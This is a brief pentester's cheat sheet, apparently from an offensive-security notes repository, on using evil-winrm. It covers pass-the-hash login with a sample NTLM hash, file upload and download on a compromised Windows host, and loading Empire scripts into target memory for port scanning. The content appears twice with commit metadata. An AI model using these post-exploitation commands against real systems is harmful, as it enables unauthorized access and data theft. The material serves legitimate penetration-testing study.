killchain-compendium/reverse_shells/docs/evil-winrm.md

# evil-winrm

* Password or NTLM Hash as authenticator

```sh
evil-winrm -u Administrator -H <Hash> -i IP
evil-winrm -u Administrator -p <Password> -i IP -P <Port>
```

## Upload & Download
* On opened host
```sh
upload <attackerFilePath>
download <remoteFilePath> <attackerFilePath>
```

## Load Powershell Scripts into Target Memory
* Load attacker scripts into target's memory
```sh
evil-winrm -u <user> -p <password> -i IP -s <localScriptDir>
```
* As an example, load Empire scripts dir for port scanning
```sh 
evil-winrm -u Administrator -H 37db630168e5f82aafa8461e05c6bbd1 -i 127.0.0.1 -P 8001 -s tools/post_exploitation/bc_security/Empire/empire/server/data/module_source/situational_awareness/network/
```

* Init `Invoke-Portscan.ps1`
* `Get-Help Invoke-Portscan`
```sh
Invoke-Portscan -Hosts 10.200.187.100 -TopPorts 50
```
second commit 2021-08-23 01:13:54 +02:00			`# evil-winrm`

			`* Password or NTLM Hash as authenticator`

			```sh
			`evil-winrm -u Administrator -H <Hash> -i IP`
			`evil-winrm -u Administrator -p <Password> -i IP -P <Port>`
			```

			`## Upload & Download`
			`* On opened host`
			```sh
			`upload <attackerFilePath>`
			`download <remoteFilePath> <attackerFilePath>`
			```

			`## Load Powershell Scripts into Target Memory`
			`* Load attacker scripts into target's memory`
			```sh
			`evil-winrm -u <user> -p <password> -i IP -s <localScriptDir>`
			```
			`* As an example, load Empire scripts dir for port scanning`
			```sh
			`evil-winrm -u Administrator -H 37db630168e5f82aafa8461e05c6bbd1 -i 127.0.0.1 -P 8001 -s tools/post_exploitation/bc_security/Empire/empire/server/data/module_source/situational_awareness/network/`
			```

			* Init `Invoke-Portscan.ps1`
			* `Get-Help Invoke-Portscan`
			```sh
			`Invoke-Portscan -Hosts 10.200.187.100 -TopPorts 50`
			```